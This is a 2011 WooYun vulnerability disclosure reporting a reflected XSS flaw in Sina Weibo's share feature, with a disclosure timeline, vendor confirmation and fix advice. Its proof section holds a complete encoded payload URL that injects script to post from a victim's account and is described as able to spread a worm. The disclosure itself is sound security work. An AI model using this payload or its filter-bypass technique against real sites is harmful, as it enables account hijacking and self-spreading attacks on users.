当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-02601

漏洞标题:新浪微博xss漏洞

相关厂商:新浪

漏洞作者: 西贝

提交时间:2011-07-31 20:21

修复时间:2011-08-30 20:22

公开时间:2011-08-30 20:22

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2011-07-31: 细节已通知厂商并且等待厂商处理中
2011-08-01: 厂商已经确认,细节仅向厂商公开
2011-08-11: 细节向核心白帽子及相关领域专家公开
2011-08-21: 细节向普通白帽子公开
2011-08-31: 细节向实习白帽子公开
2011-08-30: 细节向公众公开

简要描述:

分享到微博功能存在JS String反射式注入漏洞

详细说明:

分享到微博功能存在JS String反射式注入漏洞,可用来传播蠕虫。对IE有效

漏洞证明:

http://v.t.sina.com.cn/share/share.php?url=http%3A%2F%2Fent.sina.com.cn%2Fs%2Fu%2F2011-07-31%2F06243373397.shtml&title=%E8%8B%B1%E5%9B%BD%E5%A5%B3%E7%8E%8B%E5%A4%96%E5%AD%99%E5%A5%B3%E5%AE%8C%E5%A9%9A%20%E5%92%8C%E6%A9%84%E6%A6%84%E7%90%83%E9%98%9F%E9%95%BF%E5%96%9C%E7%BB%93%E8%BF%9E%E7%90%86&ralateUid=1642591402&source=%E6%96%B0%E6%B5%AA%E5%A8%B1%E4%B9%90&sourceUrl=http%3A%2F%2Fent.sina.com.cn%2F&content=gb2312&pic=http%3A%2F%2Fi2.sinaimg.cn%2Fent%2Fs%2Fu%2F2011-07-31%2FU3088P28T3D3373397F326DT20110731062401.jpg%5Cx22%20class%3D%5Cx22pic%5Cx22%5Cx3e%5Cx3cscript%20type%3D%5Cx22text%2Fjavascript%5Cx22%20defer%3D%5Cx22true%5Cx22%5Cx3eif(sss%3D%3D%3Dundefined){var%20sss%3Dtrue;Utils.Io.Ajax.request(%5Cx22%2Fshare%2Faj_share.php%5Cx22,{POST%3A{%5Cx22content%5Cx22%3A%5Cx22hello%20weibo!%5Cx22,%5Cx22styleid%5Cx22%3A1,%5Cx22from%5Cx22%3A%5Cx22share%5Cx22,%5Cx22sourceUrl%5Cx22%3A%5Cx22http%3A%2F%2Fent.sina.com.cn%5Cx22,%5Cx22source%5Cx22%3A%5Cx22%E6%96%B0%E6%B5%AA%E5%A8%B1%E4%B9%90%5Cx22,%5Cx22refer%5Cx22%3A%5Cx22http%3A%2F%2Fent.sina.com.cn%5Cx22,%5Cx22url_type%5Cx22%3A0,%5Cx22appkey%5Cx22%3A%5Cx224017307543%5Cx22},onComplete%3Afunction(json){},onException%3Afunction(){},returnType%3A%5Cx22json%5Cx22});}%5Cx3c%2Fscript%5Cx3e%5Cx3cimg%20width%3D0%20height%3D0%20src%3D%5Cx22

修复方案:

不要只是过滤\x3E和\x3C,即便没有"<"和">"也是可以在img的onload标签里加载js代码的。
根本的解决方法是:
php:addslashes
smarty:escape:'quotes'

版权声明:转载请注明来源 西贝@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2011-08-01 10:15

厂商回复:

多谢提供

最新状态:

暂无